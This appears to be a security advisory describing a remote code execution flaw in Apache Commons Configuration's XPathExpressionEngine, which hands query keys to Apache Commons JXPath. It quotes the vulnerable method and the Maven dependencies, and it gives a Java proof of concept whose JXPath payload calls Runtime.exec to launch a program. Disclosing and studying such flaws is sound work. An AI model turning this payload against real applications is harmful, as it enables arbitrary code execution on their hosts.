A remote code execution vulnerability has been discovered in the Apache Commons Configuration component. This vulnerability stems from the same underlying architectural design flaw as CVE-2022-41852—unsafe expression evaluation and dynamic code execution paths. Although CVE-2022-41852 was rejected due to controversy, the core security flaw persists in Commons Configuration with broader impact. As a core configuration management component for enterprise applications, Commons Configuration typically operates in higher-privileged contexts with a much larger attack surface. This vulnerability allows attackers to achieve arbitrary code execution through carefully crafted configuration input. The danger of this attack vector lies in exploiting the fundamental assumption that configuration data is "trusted" by applications, potentially rendering traditional input filtering and sandboxing mechanisms ineffective.
- Component Name: Apache Commons Configuration
- Affected Versions: All versions
- Maven Repository: https://mvnrepository.com/artifact/commons-configuration/commons-configuration
/**
* Executes a query. The passed in property key is directly passed to a
* JXPath context.
*
* @param root the configuration root node
* @param key the query to be executed
* @return a list with the nodes that are selected by the query
*/
public List<ConfigurationNode> query(ConfigurationNode root, String key)
{
if (StringUtils.isEmpty(key))
{
return Collections.singletonList(root);
}
else
{
JXPathContext context = createContext(root, key);
// This is safe because our node pointer implementations will return
// a list of configuration nodes.
@SuppressWarnings("unchecked")
List<ConfigurationNode> result = context.selectNodes(key);
if (result == null)
{
result = Collections.emptyList();
}
return result;
}
}-
Functionality Description:
- The
XPathExpressionEngineclass in the Apache Commons Configuration component implements parsing functionality for XPath expressions - According to code comments, this implementation interprets the incoming key parameter as an XPath expression
- This is the core functionality in Apache Commons Configuration for handling XPath queries
- The
-
Vulnerability Root Cause:
- This functionality uses the third-party component Apache Commons JXPath to process XPath expressions
- In the
querymethod, user input keys are directly passed to theJXPathContext.selectNodes()method for processing - Due to security flaws in Apache Commons JXPath, attackers can achieve remote code execution by crafting malicious XPath expressions
- Dependency Environment:
- Since Apache Commons Configuration sets commons-jxpath as an optional dependency (optional=true), the following dependency needs to be added manually::
<dependency>
<groupId>commons-jxpath</groupId>
<artifactId>commons-jxpath</artifactId>
<version>1.3</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-configuration</artifactId>
<version>1.10</version>
</dependency>- Commons Configuration marks commons-jxpath as an optional dependency in pom.xml:
- This means that when using Commons Configuration, if XPath-related functionality is needed, the commons-jxpath dependency must be added manually
- The vulnerability trigger depends on the presence of the commons-jxpath component
<dependency>
<groupId>commons-jxpath</groupId>
<artifactId>commons-jxpath</artifactId>
<version>1.3</version>
<optional>true</optional>
<exclusions>
<exclusion>
<groupId>xerces</groupId>
<artifactId>xerces</artifactId>
</exclusion>
<exclusion>
<groupId>ant</groupId>
<artifactId>ant-optional</artifactId>
</exclusion>
</exclusions>
</dependency>- POC code:
import org.apache.commons.configuration.tree.xpath.XPathExpressionEngine;
import org.apache.commons.configuration.tree.DefaultConfigurationNode;
import org.apache.commons.configuration.tree.ConfigurationNode;
public class jexlXPathExpressionEngine {
public static void main(String[] args) {
XPathExpressionEngine xPathExpressionEngine = new XPathExpressionEngine();
// create a ROOT node
ConfigurationNode root = new DefaultConfigurationNode("root");
// execute Java code via JXPath expression
String payload = "exec(java.lang.Runtime.getRuntime(), 'calc')";
try {
xPathExpressionEngine.query(root, payload);
} catch (Exception e) {
e.printStackTrace();
}
}
}